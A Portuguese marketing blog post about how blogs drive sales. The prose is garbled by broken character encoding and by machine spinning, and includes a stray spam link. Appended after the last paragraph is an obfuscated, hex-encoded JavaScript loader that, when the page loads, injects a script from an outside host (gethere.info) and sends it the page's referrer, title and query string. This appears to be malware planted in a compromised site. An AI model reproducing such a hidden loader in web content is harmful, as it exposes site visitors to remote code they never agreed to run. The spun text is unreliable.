Blog

Blogs E Vendas: Uma Parceria De NegA?cio Perfeito ?

Como vocA? pode supor, uma de principais razA�es pelas quais as companhias consideram os blogs eficientes como ferramentas de negA?cios A� que elas auxiliam a entregar ou estimular as vendas. Embora nA?o haja um valor quantitativo com relaA�A?o A� influA?ncia monetA?ria exata dos blogs sobre as vendas, existe evidA?ncias de algum gA�nero de retorno sobre o investimento. Este aumento nas vendas pode ser e geralmente A� um dos efeitos indiretos dos blogs de sucesso.

Blogs – bom para os negA?cios

Imagine sentar em frente ao seu computador usando milhA�es do pessoas (acionistas, parceiros do negA?cios, concorrentes, funcionA?rios e a mA�dia) conversando sobre negA?cios e afins. Agora imagine se vocA? pode vir a usar todas as informaA�A�es que o visitante aprendeu para estabelecer o produto ou serviA�o de que seus clientes querem, por que eles querem, como eles querem e quanto eles estA?o dispostos a pagar por isso. Isto A� precisamente o que A� especialmente um blog e bastante mais. Definitivamente, os blogues sA?o bons para as empresas.

Um blog ou um blog foi um site interativo que mantA�m uma crA?nica contA�nua de informaA�A�es. A� 1 site atualizado regularmente com links para outros artigos ou outros sites. Usualmente, um blog tende a ter uma A?rea do conteA?do primA?rio com artigos chamados postagens ou entradas listadas em ordem cronolA?gica inversa com as mais recentes no topo. Normalmente, esses artigos sA?o organizados em categorias. HA? tambA�m um arquivo de artigos baseado em datas. Um blogroll, uma lista por links para outros sitios relacionados A� especialmente outra caracterA�stica de um blog.

Um blog pode atalhar um ou mais feeds. A maioria dos blogs publica feeds (RSS, RDF, Atom). Um feed A� 1 conteA?do legA�vel por mA?quina que A� atualizado periodicamente. Um www.venezuelaonpalm.com leitor de feeds exibe a nova postagem e 1 link para ela. A maior parte dos blogues tambA�m tem um recurso que permite aos visitantes deixar comentA?rios. Com 1 blog, vocA? publica novos conteA?dos e seus leitores podem juntar seus prA?prios comentA?rios usando links para seus prA?prios blogs. FA?cil de utilizar ferramentas de blogs estA?o disponA�veis, imensas vezes de graA�a. Uma ferramenta bA?sica de blogging fornece uma interface onde o visitante pode trabalhar de forma fA?cil e intuitiva como cuida do restante da logA�stica envolvida em tornar seu blog apresentA?vel e disponA�vel para o pA?blico.

Blogar, criar ou manter um blog A� uma das A?reas de rA?pido crescimento da Net. De convA�nio com o popular motor de busca Technorati, andam mais de 40 milhA�es de blogues na Internet hoje em dia e mais blogs estA?o aparecendo na taxa de 75. 000 por dia. Isto foi principalmente por motivos de aos inA?meros benefA�cios de blogs para negA?cios.

Um blog tem uma poderosa propriedade de marketing para expandir seus negA?cios, seja ele pequeno ou grande. Agora vocA? pode ter uma presenA�a predominador na Web, nA?o baseada em tamanho, capital ou recursos, mas baseada na qualidade de conteA?do, pA?blico-alvo e suplementos alimentares e serviA�os A?teis. Com blogs como equalizadores, a blogosfera se tornou 1 campo de jogo verdadeiramente estimulante para todas as empresas.

Um blogue A� uma fonte repetida de informaA�A�es valiosas e atualizadas. A criaA�A?o por um blogue permite de que vocA? demonstre sua experiA?ncia e se estabeleA�a tais como um lA�der de ideias em seu setor. Um blogue pode ser seu veA�culo para atualizaA�A�es de produtos ou serviA�os, notA�cias da empresa e qualquer outra informaA�A?o de que vocA? queira transmitir ao seu pA?blico-alvo. Um blog deve reprimir informaA�A�es relevantes, nA?o somente arremessos do vendas; caso contrA?rio, A� muito menos provA?vel que os leitores retornem. Saiba como acontece usando qualquer parcela de um plano de marketing da empresa, um blog deve conter informaA�A�es que atraiam seu pA?blico-alvo.

Um blog A� 1 mA�todo eficiente para se comunicar com clientes e prospects. Ele permite que vocA? converse abertamente e regularmente usando eles, aumentando a credibilidade, criando confianA�a e formando relacionamentos usando eles a partir de o princA�pio. Um blogue com seu estilo por conversaA�A?o foi ideal para desenvolver bons relacionamentos com os clientes. Os leitores sentir-se-A?o A� vontade consigo bastante antes de telefonarem-lhe para criar uma adquire ou aproveitar o seu serviA�o.

Um blogue A� uma A?tima ferramenta para adquirir feedback dos leitores. Seus leitores podem vir a deixar comentA?rios ou fazer perguntas. Um blog foi uma A?tima maneira por descobrir este que estes leitores estA?o pensando e no processo fornece idA�ias ou como melhor atendA?-los, melhorando assim o seu negA?cio. Formar decisA�es por negA?cios usando base nos feedbacks destes leitores pode vir a ser 1 dos movimentos mais hA?beis que vocA? pode fazer.

Ainda assim, para ser eficaz, 1 blog tem que ser atualizado com freqA?A?ncia. Estes leitores nA?o visitam blogs que nA?o apresentam novos conteA?dos regularmente. Manter estes leitores informados com postagens periA?dicas a cerca de o seu negA?cio cria buzz e publicidade. HA? trabalho envolvido na criaA�A?o de 1 blog. Leva tempo e compromisso para escrever posts interessantes e informativos. Mas pode ser bem gasto, especialmente se ajudar a gerar vendas.

Blogs e Vendas Em Tandem

As vendas pedem interaA�A?o privada. Um blog A� 1 desses lugares onde a comunicaA�A?o atravA�s de conversas prospera e os relacionamentos sA?o fomentados. Quando vocA? dA? aos seus leitores informaA�A�es importantes que eles podem vir a usar atravA�s do seu blog de forma consistente, eles ficarA?o satisfeitos. Em seguida, eles retornarA?o para ainda mais conteA?do recente regularmente. Horas extras, vocA? serA? pesado de obter um pA?blico fiel. Os leitores vA?o vA?-lo saiba como um especialista em seu nicho especA�fico. Seus leitores vA?o confiar em vocA? e um relacionamento A� desenvolvido. Seus leitores perceberA?o de que A� menos arriscado adquirir de o visitante ou emanar seu serviA�o. Se o visitante pode blogar eficientemente a respeito de o tema, eles tendem a confiar que seu produto ou serviA�o valerA? a penado.

Ao blogar, o visitante estA? enviando a recado de que alguA�m estA? ouvindo, alguA�m que vocA? pode vir a abordar tais como pode ser visto a partir do comentA?rios respondidos e novas atualizaA�A�es. Isso farA? usando que seus leitores se sintam muito mais seguros e levarA? isso em lado, pois eles tomam uma decisA?o do compra. O blog A� inerentemente uma conversa contA�nua que, a longo prazo, gera confianA�a e lealdade e proporciona familiaridade. Quando eles se tornarem clientes satisfeitos, eles virA?o atA� mesmo vocA? para obter mais informaA�A�es e, se receberem a opA�A?o, desejarA?o adquirir de vocA?. Isso fortalece o relacionamento entre vocA? e seus clientes e eles tambA�m igualmente similarmente identicamente conjuntamente podem enviar outras vendas para o visitante. O ciclo continua. AlA�m disso, 1 blog A� uma maneira extremamente eficiente para conseguir um ranking elevado do Search Engine. Em outras palavras, estes blogs podem trazer mais leitores e mais compradores em potencial.

Blogar A� especialmente marketing para as pessoas por uma forma menos intrusiva e ofensiva, mais tais como uma conversa freewheeling em comparaA�A?o usando um discurso de vendas irritante. A� especialmente realmente uma boa forma de estimular as vendas, ainda que indiretamente.

var _0xb322=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}